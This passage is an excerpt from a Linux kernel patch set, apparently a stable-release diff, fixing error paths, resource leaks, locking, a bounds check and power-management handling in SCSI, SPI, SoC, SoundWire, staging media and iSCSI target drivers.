+@@ -2941,7 +2941,7 @@ static int _dasd_requeue_request(struct dasd_ccw_req *cqr)
+ 		return 0;
+ 	spin_lock_irq(&cqr->dq->lock);
+ 	req = (struct request *) cqr->callback_data;
+-	blk_mq_requeue_request(req, false);
++	blk_mq_requeue_request(req, true);
+ 	spin_unlock_irq(&cqr->dq->lock);
+ 
+ 	return 0;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
+index d643c5a49aa94..70c24377c6a19 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
+@@ -1258,7 +1258,11 @@ static void slot_complete_v1_hw(struct hisi_hba *hisi_hba,
+ 
+ 		slot_err_v1_hw(hisi_hba, task, slot);
+ 		if (unlikely(slot->abort)) {
+-			sas_task_abort(task);
++			if (dev_is_sata(device) && task->ata_task.use_ncq)
++				sas_ata_device_link_abort(device, true);
++			else
++				sas_task_abort(task);
++
+ 			return;
+ 		}
+ 		goto out;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+index cded42f4ca445..02575d81afca2 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+@@ -2404,7 +2404,11 @@ static void slot_complete_v2_hw(struct hisi_hba *hisi_hba,
+ 				 error_info[2], error_info[3]);
+ 
+ 		if (unlikely(slot->abort)) {
+-			sas_task_abort(task);
++			if (dev_is_sata(device) && task->ata_task.use_ncq)
++				sas_ata_device_link_abort(device, true);
++			else
++				sas_task_abort(task);
++
+ 			return;
+ 		}
+ 		goto out;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index a63279f55d096..9afc23e3a80fc 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -2320,7 +2320,11 @@ static void slot_complete_v3_hw(struct hisi_hba *hisi_hba,
+ 					error_info[0], error_info[1],
+ 					error_info[2], error_info[3]);
+ 			if (unlikely(slot->abort)) {
+-				sas_task_abort(task);
++				if (dev_is_sata(device) && task->ata_task.use_ncq)
++					sas_ata_device_link_abort(device, true);
++				else
++					sas_task_abort(task);
++
+ 				return;
+ 			}
+ 			goto out;
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index eeb73da754d0d..99d2694fe00a0 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -11970,7 +11970,7 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 				goto out_iounmap_all;
+ 		} else {
+ 			error = -ENOMEM;
+-			goto out_iounmap_all;
++			goto out_iounmap_ctrl;
+ 		}
+ 	}
+ 
+@@ -11988,7 +11988,7 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 			dev_err(&pdev->dev,
+ 			   "ioremap failed for SLI4 HBA dpp registers.\n");
+ 			error = -ENOMEM;
+-			goto out_iounmap_ctrl;
++			goto out_iounmap_all;
+ 		}
+ 		phba->pci_bar4_memmap_p = phba->sli4_hba.dpp_regs_memmap_p;
+ 	}
+@@ -12013,9 +12013,11 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 	return 0;
+ 
+ out_iounmap_all:
+-	iounmap(phba->sli4_hba.drbl_regs_memmap_p);
++	if (phba->sli4_hba.drbl_regs_memmap_p)
++		iounmap(phba->sli4_hba.drbl_regs_memmap_p);
+ out_iounmap_ctrl:
+-	iounmap(phba->sli4_hba.ctrl_regs_memmap_p);
++	if (phba->sli4_hba.ctrl_regs_memmap_p)
++		iounmap(phba->sli4_hba.ctrl_regs_memmap_p);
+ out_iounmap_conf:
+ 	iounmap(phba->sli4_hba.conf_regs_memmap_p);
+ 
+diff --git a/drivers/scsi/megaraid.c b/drivers/scsi/megaraid.c
+index bf491af9f0d65..16e2cf848c6ef 100644
+--- a/drivers/scsi/megaraid.c
++++ b/drivers/scsi/megaraid.c
+@@ -1441,6 +1441,7 @@ mega_cmd_done(adapter_t *adapter, u8 completed[], int nstatus, int status)
+ 		 */
+ 		if (cmdid == CMDID_INT_CMDS) {
+ 			scb = &adapter->int_scb;
++			cmd = scb->cmd;
+ 
+ 			list_del_init(&scb->list);
+ 			scb->state = SCB_FREE;
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index a565817aa56d4..d109a4ceb72b1 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -2526,7 +2526,7 @@ static void mpi3mr_watchdog_work(struct work_struct *work)
+ 		mrioc->unrecoverable = 1;
+ 		goto schedule_work;
+ 	case MPI3_SYSIF_FAULT_CODE_SOFT_RESET_IN_PROGRESS:
+-		return;
++		goto schedule_work;
+ 	case MPI3_SYSIF_FAULT_CODE_CI_ACTIVATION_RESET:
+ 		reset_reason = MPI3MR_RESET_FROM_CIACTIV_FAULT;
+ 		break;
+diff --git a/drivers/soc/bcm/brcmstb/biuctrl.c b/drivers/soc/bcm/brcmstb/biuctrl.c
+index e1d7b45432485..364ddbe365c24 100644
+--- a/drivers/soc/bcm/brcmstb/biuctrl.c
++++ b/drivers/soc/bcm/brcmstb/biuctrl.c
+@@ -288,6 +288,10 @@ static int __init setup_hifcpubiuctrl_regs(struct device_node *np)
+ 	if (BRCM_ID(family_id) == 0x7260 && BRCM_REV(family_id) == 0)
+ 		cpubiuctrl_regs = b53_cpubiuctrl_no_wb_regs;
+ out:
++	if (ret && cpubiuctrl_base) {
++		iounmap(cpubiuctrl_base);
++		cpubiuctrl_base = NULL;
++	}
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soc/qcom/rpmh-rsc.c b/drivers/soc/qcom/rpmh-rsc.c
+index 0f8b2249f8894..f93544f6d7961 100644
+--- a/drivers/soc/qcom/rpmh-rsc.c
++++ b/drivers/soc/qcom/rpmh-rsc.c
+@@ -1073,7 +1073,7 @@ static int rpmh_rsc_probe(struct platform_device *pdev)
+ 	drv->ver.minor = rsc_id & (MINOR_VER_MASK << MINOR_VER_SHIFT);
+ 	drv->ver.minor >>= MINOR_VER_SHIFT;
+ 
+-	if (drv->ver.major == 3 && drv->ver.minor == 0)
++	if (drv->ver.major == 3 && drv->ver.minor >= 0)
+ 		drv->regs = rpmh_rsc_reg_offset_ver_3_0;
+ 	else
+ 		drv->regs = rpmh_rsc_reg_offset_ver_2_7;
+diff --git a/drivers/soc/renesas/renesas-soc.c b/drivers/soc/renesas/renesas-soc.c
+index 468ebce1ea88b..51191d1a6dd1d 100644
+--- a/drivers/soc/renesas/renesas-soc.c
++++ b/drivers/soc/renesas/renesas-soc.c
+@@ -471,8 +471,11 @@ static int __init renesas_soc_init(void)
+ 	}
+ 
+ 	soc_dev_attr = kzalloc(sizeof(*soc_dev_attr), GFP_KERNEL);
+-	if (!soc_dev_attr)
++	if (!soc_dev_attr) {
++		if (chipid)
++			iounmap(chipid);
+ 		return -ENOMEM;
++	}
+ 
+ 	np = of_find_node_by_path("/");
+ 	of_property_read_string(np, "model", &soc_dev_attr->machine);
+diff --git a/drivers/soc/ti/k3-ringacc.c b/drivers/soc/ti/k3-ringacc.c
+index e01e4d815230a..8f131368a7586 100644
+--- a/drivers/soc/ti/k3-ringacc.c
++++ b/drivers/soc/ti/k3-ringacc.c
+@@ -406,6 +406,11 @@ static int k3_dmaring_request_dual_ring(struct k3_ringacc *ringacc, int fwd_id,
+ 
+ 	mutex_lock(&ringacc->req_lock);
+ 
++	if (!try_module_get(ringacc->dev->driver->owner)) {
++		ret = -EINVAL;
++		goto err_module_get;
++	}
++
+ 	if (test_bit(fwd_id, ringacc->rings_inuse)) {
+ 		ret = -EBUSY;
+ 		goto error;
+@@ -421,6 +426,8 @@ static int k3_dmaring_request_dual_ring(struct k3_ringacc *ringacc, int fwd_id,
+ 	return 0;
+ 
+ error:
++	module_put(ringacc->dev->driver->owner);
++err_module_get:
+ 	mutex_unlock(&ringacc->req_lock);
+ 	return ret;
+ }
+diff --git a/drivers/soc/ti/pm33xx.c b/drivers/soc/ti/pm33xx.c
+index ce09c42eaed25..f04c21157904b 100644
+--- a/drivers/soc/ti/pm33xx.c
++++ b/drivers/soc/ti/pm33xx.c
+@@ -527,7 +527,7 @@ static int am33xx_pm_probe(struct platform_device *pdev)
+ 
+ 	ret = am33xx_pm_alloc_sram();
+ 	if (ret)
+-		return ret;
++		goto err_wkup_m3_ipc_put;
+ 
+ 	ret = am33xx_pm_rtc_setup();
+ 	if (ret)
+@@ -572,13 +572,14 @@ err_pm_runtime_put:
+ 	pm_runtime_put_sync(dev);
+ err_pm_runtime_disable:
+ 	pm_runtime_disable(dev);
+-	wkup_m3_ipc_put(m3_ipc);
+ err_unsetup_rtc:
+ 	iounmap(rtc_base_virt);
+ 	clk_put(rtc_fck);
+ err_free_sram:
+ 	am33xx_pm_free_sram();
+ 	pm33xx_dev = NULL;
++err_wkup_m3_ipc_put:
++	wkup_m3_ipc_put(m3_ipc);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soundwire/cadence_master.h b/drivers/soundwire/cadence_master.h
+index e0a64b28c6b9c..4393607c7e4ad 100644
+--- a/drivers/soundwire/cadence_master.h
++++ b/drivers/soundwire/cadence_master.h
+@@ -84,7 +84,6 @@ struct sdw_cdns_stream_config {
+  * @bus: Bus handle
+  * @stream_type: Stream type
+  * @link_id: Master link id
+- * @hw_params: hw_params to be applied in .prepare step
+  * @suspended: status set when suspended, to be used in .prepare
+  * @paused: status set in .trigger, to be used in suspend
+  * @direction: stream direction
+@@ -96,7 +95,6 @@ struct sdw_cdns_dai_runtime {
+ 	struct sdw_bus *bus;
+ 	enum sdw_stream_type stream_type;
+ 	int link_id;
+-	struct snd_pcm_hw_params *hw_params;
+ 	bool suspended;
+ 	bool paused;
+ 	int direction;
+diff --git a/drivers/soundwire/intel.c b/drivers/soundwire/intel.c
+index bc9c50bacc494..c852745989167 100644
+--- a/drivers/soundwire/intel.c
++++ b/drivers/soundwire/intel.c
+@@ -833,7 +833,6 @@ static int intel_hw_params(struct snd_pcm_substream *substream,
+ 	dai_runtime->paused = false;
+ 	dai_runtime->suspended = false;
+ 	dai_runtime->pdi = pdi;
+-	dai_runtime->hw_params = params;
+ 
+ 	/* Inform DSP about PDI stream number */
+ 	ret = intel_params_stream(sdw, substream->stream, dai, params,
+@@ -886,6 +885,11 @@ static int intel_prepare(struct snd_pcm_substream *substream,
+ 	}
+ 
+ 	if (dai_runtime->suspended) {
++		struct snd_soc_pcm_runtime *rtd = asoc_substream_to_rtd(substream);
++		struct snd_pcm_hw_params *hw_params;
++
++		hw_params = &rtd->dpcm[substream->stream].hw_params;
++
+ 		dai_runtime->suspended = false;
+ 
+ 		/*
+@@ -897,7 +901,7 @@ static int intel_prepare(struct snd_pcm_substream *substream,
+ 		 */
+ 
+ 		/* configure stream */
+-		ch = params_channels(dai_runtime->hw_params);
++		ch = params_channels(hw_params);
+ 		if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
+ 			dir = SDW_DATA_DIR_RX;
+ 		else
+@@ -909,7 +913,7 @@ static int intel_prepare(struct snd_pcm_substream *substream,
+ 
+ 		/* Inform DSP about PDI stream number */
+ 		ret = intel_params_stream(sdw, substream->stream, dai,
+-					  dai_runtime->hw_params,
++					  hw_params,
+ 					  sdw->instance,
+ 					  dai_runtime->pdi->intel_alh_id);
+ 	}
+@@ -948,7 +952,6 @@ intel_hw_free(struct snd_pcm_substream *substream, struct snd_soc_dai *dai)
+ 		return ret;
+ 	}
+ 
+-	dai_runtime->hw_params = NULL;
+ 	dai_runtime->pdi = NULL;
+ 
+ 	return 0;
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index 3354248702900..ba502129150d5 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
+@@ -704,7 +704,7 @@ static int qcom_swrm_init(struct qcom_swrm_ctrl *ctrl)
+ 	}
+ 
+ 	/* Configure number of retries of a read/write cmd */
+-	if (ctrl->version > 0x01050001) {
++	if (ctrl->version >= 0x01050001) {
+ 		/* Only for versions >= 1.5.1 */
+ 		ctrl->reg_write(ctrl, SWRM_CMD_FIFO_CFG_ADDR,
+ 				SWRM_RD_WR_CMD_RETRIES |
+diff --git a/drivers/spi/atmel-quadspi.c b/drivers/spi/atmel-quadspi.c
+index 70637e46290a4..e8971ec74f82e 100644
+--- a/drivers/spi/atmel-quadspi.c
++++ b/drivers/spi/atmel-quadspi.c
+@@ -706,18 +706,28 @@ static int atmel_qspi_remove(struct platform_device *pdev)
+ 	struct atmel_qspi *aq = spi_controller_get_devdata(ctrl);
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&pdev->dev);
+-	if (ret < 0)
+-		return ret;
+-
+ 	spi_unregister_controller(ctrl);
+-	atmel_qspi_write(QSPI_CR_QSPIDIS, aq, QSPI_CR);
++
++	ret = pm_runtime_get_sync(&pdev->dev);
++	if (ret >= 0) {
++		atmel_qspi_write(QSPI_CR_QSPIDIS, aq, QSPI_CR);
++		clk_disable(aq->qspick);
++		clk_disable(aq->pclk);
++	} else {
++		/*
++		 * atmel_qspi_runtime_{suspend,resume} just disable and enable
++		 * the two clks respectively. So after resume failed these are
++		 * off, and we skip hardware access and disabling these clks again.
++		 */
++		dev_warn(&pdev->dev, "Failed to resume device on remove\n");
++	}
++
++	clk_unprepare(aq->qspick);
++	clk_unprepare(aq->pclk);
+ 
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 
+-	clk_disable_unprepare(aq->qspick);
+-	clk_disable_unprepare(aq->pclk);
+ 	return 0;
+ }
+ 
+@@ -786,7 +796,11 @@ static int __maybe_unused atmel_qspi_runtime_resume(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	return clk_enable(aq->qspick);
++	ret = clk_enable(aq->qspick);
++	if (ret)
++		clk_disable(aq->pclk);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops __maybe_unused atmel_qspi_pm_ops = {
+diff --git a/drivers/spi/spi-cadence-quadspi.c b/drivers/spi/spi-cadence-quadspi.c
+index 676313e1bdad1..fa11610ab40b0 100644
+--- a/drivers/spi/spi-cadence-quadspi.c
++++ b/drivers/spi/spi-cadence-quadspi.c
+@@ -1768,32 +1768,36 @@ static int cqspi_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-#ifdef CONFIG_PM_SLEEP
+ static int cqspi_suspend(struct device *dev)
+ {
+ 	struct cqspi_st *cqspi = dev_get_drvdata(dev);
++	struct spi_master *master = dev_get_drvdata(dev);
++	int ret;
+ 
++	ret = spi_master_suspend(master);
+ 	cqspi_controller_enable(cqspi, 0);
+-	return 0;
++
++	clk_disable_unprepare(cqspi->clk);
++
++	return ret;
+ }
+ 
+ static int cqspi_resume(struct device *dev)
+ {
+ 	struct cqspi_st *cqspi = dev_get_drvdata(dev);
++	struct spi_master *master = dev_get_drvdata(dev);
+ 
+-	cqspi_controller_enable(cqspi, 1);
+-	return 0;
+-}
++	clk_prepare_enable(cqspi->clk);
++	cqspi_wait_idle(cqspi);
++	cqspi_controller_init(cqspi);
+ 
+-static const struct dev_pm_ops cqspi__dev_pm_ops = {
+-	.suspend = cqspi_suspend,
+-	.resume = cqspi_resume,
+-};
++	cqspi->current_cs = -1;
++	cqspi->sclk = 0;
++
++	return spi_master_resume(master);
++}
+ 
+-#define CQSPI_DEV_PM_OPS	(&cqspi__dev_pm_ops)
+-#else
+-#define CQSPI_DEV_PM_OPS	NULL
+-#endif
++static DEFINE_SIMPLE_DEV_PM_OPS(cqspi_dev_pm_ops, cqspi_suspend, cqspi_resume);
+ 
+ static const struct cqspi_driver_platdata cdns_qspi = {
+ 	.quirks = CQSPI_DISABLE_DAC_MODE,
+@@ -1860,7 +1864,7 @@ static struct platform_driver cqspi_platform_driver = {
+ 	.remove = cqspi_remove,
+ 	.driver = {
+ 		.name = CQSPI_NAME,
+-		.pm = CQSPI_DEV_PM_OPS,
++		.pm = &cqspi_dev_pm_ops,
+ 		.of_match_table = cqspi_dt_ids,
+ 	},
+ };
+diff --git a/drivers/spi/spi-fsl-spi.c b/drivers/spi/spi-fsl-spi.c
+index 93152144fd2ec..5602f052b2b50 100644
+--- a/drivers/spi/spi-fsl-spi.c
++++ b/drivers/spi/spi-fsl-spi.c
+@@ -181,8 +181,8 @@ static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 				struct spi_device *spi,
+ 				int bits_per_word)
+ {
+-	/* QE uses Little Endian for words > 8
+-	 * so transform all words > 8 into 8 bits
++	/* CPM/QE uses Little Endian for words > 8
++	 * so transform 16 and 32 bits words into 8 bits
+ 	 * Unfortnatly that doesn't work for LSB so
+ 	 * reject these for now */
+ 	/* Note: 32 bits word, LSB works iff
+@@ -190,9 +190,11 @@ static int mspi_apply_qe_mode_quirks(struct spi_mpc8xxx_cs *cs,
+ 	if (spi->mode & SPI_LSB_FIRST &&
+ 	    bits_per_word > 8)
+ 		return -EINVAL;
+-	if (bits_per_word > 8)
++	if (bits_per_word <= 8)
++		return bits_per_word;
++	if (bits_per_word == 16 || bits_per_word == 32)
+ 		return 8; /* pretend its 8 bits */
+-	return bits_per_word;
++	return -EINVAL;
+ }
+ 
+ static int fsl_spi_setup_transfer(struct spi_device *spi,
+@@ -222,7 +224,7 @@ static int fsl_spi_setup_transfer(struct spi_device *spi,
+ 		bits_per_word = mspi_apply_cpu_mode_quirks(cs, spi,
+ 							   mpc8xxx_spi,
+ 							   bits_per_word);
+-	else if (mpc8xxx_spi->flags & SPI_QE)
++	else
+ 		bits_per_word = mspi_apply_qe_mode_quirks(cs, spi,
+ 							  bits_per_word);
+ 
+diff --git a/drivers/spi/spi-imx.c b/drivers/spi/spi-imx.c
+index e4ccd0c329d06..6c9c87cd14cae 100644
+--- a/drivers/spi/spi-imx.c
++++ b/drivers/spi/spi-imx.c
+@@ -1856,13 +1856,11 @@ static int spi_imx_remove(struct platform_device *pdev)
+ 
+ 	spi_unregister_controller(controller);
+ 
+-	ret = pm_runtime_resume_and_get(spi_imx->dev);
+-	if (ret < 0) {
+-		dev_err(spi_imx->dev, "failed to enable clock\n");
+-		return ret;
+-	}
+-
+-	writel(0, spi_imx->base + MXC_CSPICTRL);
++	ret = pm_runtime_get_sync(spi_imx->dev);
++	if (ret >= 0)
++		writel(0, spi_imx->base + MXC_CSPICTRL);
++	else
++		dev_warn(spi_imx->dev, "failed to enable clock, skip hw disable\n");
+ 
+ 	pm_runtime_dont_use_autosuspend(spi_imx->dev);
+ 	pm_runtime_put_sync(spi_imx->dev);
+diff --git a/drivers/spi/spi-pci1xxxx.c b/drivers/spi/spi-pci1xxxx.c
+index a31c3b612a430..13efbfeff92ce 100644
+--- a/drivers/spi/spi-pci1xxxx.c
++++ b/drivers/spi/spi-pci1xxxx.c
+@@ -58,7 +58,7 @@
+ #define VENDOR_ID_MCHP 0x1055
+ 
+ #define SPI_SUSPEND_CONFIG 0x101
+-#define SPI_RESUME_CONFIG 0x303
++#define SPI_RESUME_CONFIG 0x203
+ 
+ struct pci1xxxx_spi_internal {
+ 	u8 hw_inst;
+@@ -199,8 +199,9 @@ static int pci1xxxx_spi_transfer_one(struct spi_controller *spi_ctlr,
+ 			else
+ 				regval &= ~SPI_MST_CTL_MODE_SEL;
+ 
+-			regval |= ((clkdiv << 5) | SPI_FORCE_CE | (len << 8));
++			regval |= ((clkdiv << 5) | SPI_FORCE_CE);
+ 			regval &= ~SPI_MST_CTL_CMD_LEN_MASK;
++			regval |= (len << 8);
+ 			writel(regval, par->reg_base +
+ 			       SPI_MST_CTL_REG_OFFSET(p->hw_inst));
+ 			regval = readl(par->reg_base +
+diff --git a/drivers/spi/spi-qup.c b/drivers/spi/spi-qup.c
+index 678dc51ef0174..205e54f157b4a 100644
+--- a/drivers/spi/spi-qup.c
++++ b/drivers/spi/spi-qup.c
+@@ -1277,18 +1277,22 @@ static int spi_qup_remove(struct platform_device *pdev)
+ 	struct spi_qup *controller = spi_master_get_devdata(master);
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&pdev->dev);
+-	if (ret < 0)
+-		return ret;
++	ret = pm_runtime_get_sync(&pdev->dev);
+ 
+-	ret = spi_qup_set_state(controller, QUP_STATE_RESET);
+-	if (ret)
+-		return ret;
++	if (ret >= 0) {
++		ret = spi_qup_set_state(controller, QUP_STATE_RESET);
++		if (ret)
++			dev_warn(&pdev->dev, "failed to reset controller (%pe)\n",
++				 ERR_PTR(ret));
+ 
+-	spi_qup_release_dma(master);
++		clk_disable_unprepare(controller->cclk);
++		clk_disable_unprepare(controller->iclk);
++	} else {
++		dev_warn(&pdev->dev, "failed to resume, skip hw disable (%pe)\n",
++			 ERR_PTR(ret));
++	}
+ 
+-	clk_disable_unprepare(controller->cclk);
+-	clk_disable_unprepare(controller->iclk);
++	spi_qup_release_dma(master);
+ 
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+diff --git a/drivers/spi/spi-sn-f-ospi.c b/drivers/spi/spi-sn-f-ospi.c
+index 333b22dfd8dba..0aedade8908c4 100644
+--- a/drivers/spi/spi-sn-f-ospi.c
++++ b/drivers/spi/spi-sn-f-ospi.c
+@@ -561,7 +561,7 @@ static bool f_ospi_supports_op(struct spi_mem *mem,
+ 	if (!f_ospi_supports_op_width(mem, op))
+ 		return false;
+ 
+-	return true;
++	return spi_mem_default_supports_op(mem, op);
+ }
+ 
+ static int f_ospi_adjust_op_size(struct spi_mem *mem, struct spi_mem_op *op)
+diff --git a/drivers/spmi/spmi.c b/drivers/spmi/spmi.c
+index 55381592bb5a6..e73d3017863cb 100644
+--- a/drivers/spmi/spmi.c
++++ b/drivers/spmi/spmi.c
+@@ -350,7 +350,8 @@ static void spmi_drv_remove(struct device *dev)
+ 	const struct spmi_driver *sdrv = to_spmi_driver(dev->driver);
+ 
+ 	pm_runtime_get_sync(dev);
+-	sdrv->remove(to_spmi_device(dev));
++	if (sdrv->remove)
++		sdrv->remove(to_spmi_device(dev));
+ 	pm_runtime_put_noidle(dev);
+ 
+ 	pm_runtime_disable(dev);
+diff --git a/drivers/staging/iio/resolver/ad2s1210.c b/drivers/staging/iio/resolver/ad2s1210.c
+index e4cf42438487d..636c45b128438 100644
+--- a/drivers/staging/iio/resolver/ad2s1210.c
++++ b/drivers/staging/iio/resolver/ad2s1210.c
+@@ -101,7 +101,7 @@ struct ad2s1210_state {
+ static const int ad2s1210_mode_vals[4][2] = {
+ 	[MOD_POS] = { 0, 0 },
+ 	[MOD_VEL] = { 0, 1 },
+-	[MOD_CONFIG] = { 1, 0 },
++	[MOD_CONFIG] = { 1, 1 },
+ };
+ 
+ static inline void ad2s1210_set_mode(enum ad2s1210_mode mode,
+diff --git a/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c b/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
+index 0bf513c26b6b5..a5c5bebad3061 100644
+--- a/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
++++ b/drivers/staging/media/deprecated/saa7146/av7110/av7110_av.c
+@@ -823,10 +823,10 @@ static int write_ts_to_decoder(struct av7110 *av7110, int type, const u8 *buf, s
+ 		av7110_ipack_flush(ipack);
+ 
+ 	if (buf[3] & ADAPT_FIELD) {
++		if (buf[4] > len - 1 - 4)
++			return 0;
+ 		len -= buf[4] + 1;
+ 		buf += buf[4] + 1;
+-		if (!len)
+-			return 0;
+ 	}
+ 
+ 	av7110_ipack_instant_repack(buf + 4, len - 4, ipack);
+diff --git a/drivers/staging/media/rkvdec/rkvdec.c b/drivers/staging/media/rkvdec/rkvdec.c
+index 7bab7586918c1..82806f198074a 100644
+--- a/drivers/staging/media/rkvdec/rkvdec.c
++++ b/drivers/staging/media/rkvdec/rkvdec.c
+@@ -1066,6 +1066,8 @@ static int rkvdec_remove(struct platform_device *pdev)
+ {
+ 	struct rkvdec_dev *rkvdec = platform_get_drvdata(pdev);
+ 
++	cancel_delayed_work_sync(&rkvdec->watchdog_work);
++
+ 	rkvdec_v4l2_cleanup(rkvdec);
+ 	pm_runtime_disable(&pdev->dev);
+ 	pm_runtime_dont_use_autosuspend(&pdev->dev);
+diff --git a/drivers/staging/media/sunxi/cedrus/cedrus.c b/drivers/staging/media/sunxi/cedrus/cedrus.c
+index a43d5ff667163..a50a4d0a8f715 100644
+--- a/drivers/staging/media/sunxi/cedrus/cedrus.c
++++ b/drivers/staging/media/sunxi/cedrus/cedrus.c
+@@ -547,6 +547,7 @@ static int cedrus_remove(struct platform_device *pdev)
+ {
+ 	struct cedrus_dev *dev = platform_get_drvdata(pdev);
+ 
++	cancel_delayed_work_sync(&dev->watchdog_work);
+ 	if (media_devnode_is_registered(dev->mdev.devnode)) {
+ 		media_device_unregister(&dev->mdev);
+ 		v4l2_m2m_unregister_media_controller(dev->m2m_dev);
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+index f8fbe78ccad9f..699ee7754428c 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+@@ -716,6 +716,7 @@ static int _rtl92e_sta_up(struct net_device *dev, bool is_silent_reset)
+ 	else
+ 		netif_wake_queue(dev);
+ 
++	priv->bfirst_after_down = false;
+ 	return 0;
+ }
+ 
+diff --git a/drivers/staging/rtl8723bs/core/rtw_mlme.c b/drivers/staging/rtl8723bs/core/rtw_mlme.c
+index c6fd6cf741ef6..091842d70d486 100644
+--- a/drivers/staging/rtl8723bs/core/rtw_mlme.c
++++ b/drivers/staging/rtl8723bs/core/rtw_mlme.c
+@@ -1549,7 +1549,7 @@ void _rtw_join_timeout_handler(struct timer_list *t)
+ 	if (adapter->bDriverStopped || adapter->bSurpriseRemoved)
+ 		return;
+ 
+-	spin_lock_irq(&pmlmepriv->lock);
++	spin_lock_bh(&pmlmepriv->lock);
+ 
+ 	if (rtw_to_roam(adapter) > 0) { /* join timeout caused by roaming */
+ 		while (1) {
+@@ -1577,7 +1577,7 @@ void _rtw_join_timeout_handler(struct timer_list *t)
+ 
+ 	}
+ 
+-	spin_unlock_irq(&pmlmepriv->lock);
++	spin_unlock_bh(&pmlmepriv->lock);
+ }
+ 
+ /*
+@@ -1590,11 +1590,11 @@ void rtw_scan_timeout_handler(struct timer_list *t)
+ 						  mlmepriv.scan_to_timer);
+ 	struct	mlme_priv *pmlmepriv = &adapter->mlmepriv;
+ 
+-	spin_lock_irq(&pmlmepriv->lock);
++	spin_lock_bh(&pmlmepriv->lock);
+ 
+ 	_clr_fwstate_(pmlmepriv, _FW_UNDER_SURVEY);
+ 
+-	spin_unlock_irq(&pmlmepriv->lock);
++	spin_unlock_bh(&pmlmepriv->lock);
+ 
+ 	rtw_indicate_scan_done(adapter, true);
+ }
+diff --git a/drivers/target/iscsi/iscsi_target.c b/drivers/target/iscsi/iscsi_target.c
+index baf4da7bb3b4e..3f7a9f7f5f4e3 100644
+--- a/drivers/target/iscsi/iscsi_target.c
++++ b/drivers/target/iscsi/iscsi_target.c
+@@ -1190,9 +1190,10 @@ int iscsit_setup_scsi_cmd(struct iscsit_conn *conn, struct iscsit_cmd *cmd,
+ 	 * Initialize struct se_cmd descriptor from target_core_mod infrastructure
+ 	 */
+ 	__target_init_cmd(&cmd->se_cmd, &iscsi_ops,
+-			 conn->sess->se_sess, be32_to_cpu(hdr->data_length),
+-			 cmd->data_direction, sam_task_attr,
+-			 cmd->sense_buffer + 2, scsilun_to_int(&hdr->lun));
++			  conn->sess->se_sess, be32_to_cpu(hdr->data_length),
++			  cmd->data_direction, sam_task_attr,
++			  cmd->sense_buffer + 2, scsilun_to_int(&hdr->lun),
++			  conn->cmd_cnt);
+ 
+ 	pr_debug("Got SCSI Command, ITT: 0x%08x, CmdSN: 0x%08x,"
+ 		" ExpXferLen: %u, Length: %u, CID: %hu\n", hdr->itt,
+@@ -2055,7 +2056,8 @@ iscsit_handle_task_mgt_cmd(struct iscsit_conn *conn, struct iscsit_cmd *cmd,
+ 	__target_init_cmd(&cmd->se_cmd, &iscsi_ops,
+ 			  conn->sess->se_sess, 0, DMA_NONE,
+ 			  TCM_SIMPLE_TAG, cmd->sense_buffer + 2,
+-			  scsilun_to_int(&hdr->lun));
++			  scsilun_to_int(&hdr->lun),
++			  conn->cmd_cnt);
+ 
+ 	target_get_sess_cmd(&cmd->se_cmd, true);
+ 
+@@ -4218,9 +4220,12 @@ static void iscsit_release_commands_from_conn(struct iscsit_conn *conn)
+ 	list_for_each_entry_safe(cmd, cmd_tmp, &tmp_list, i_conn_node) {
+ 		struct se_cmd *se_cmd = &cmd->se_cmd;
+ 
+-		if (se_cmd->se_tfo != NULL) {
+-			spin_lock_irq(&se_cmd->t_state_lock);
+-			if (se_cmd->transport_state & CMD_T_ABORTED) {
++		if (!se_cmd->se_tfo)
++			continue;
++
++		spin_lock_irq(&se_cmd->t_state_lock);
++		if (se_cmd->transport_state & CMD_T_ABORTED) {
++			if (!(se_cmd->transport_state & CMD_T_TAS))
+ 				/*
+ 				 * LIO's abort path owns the cleanup for this,
+ 				 * so put it back on the list and let
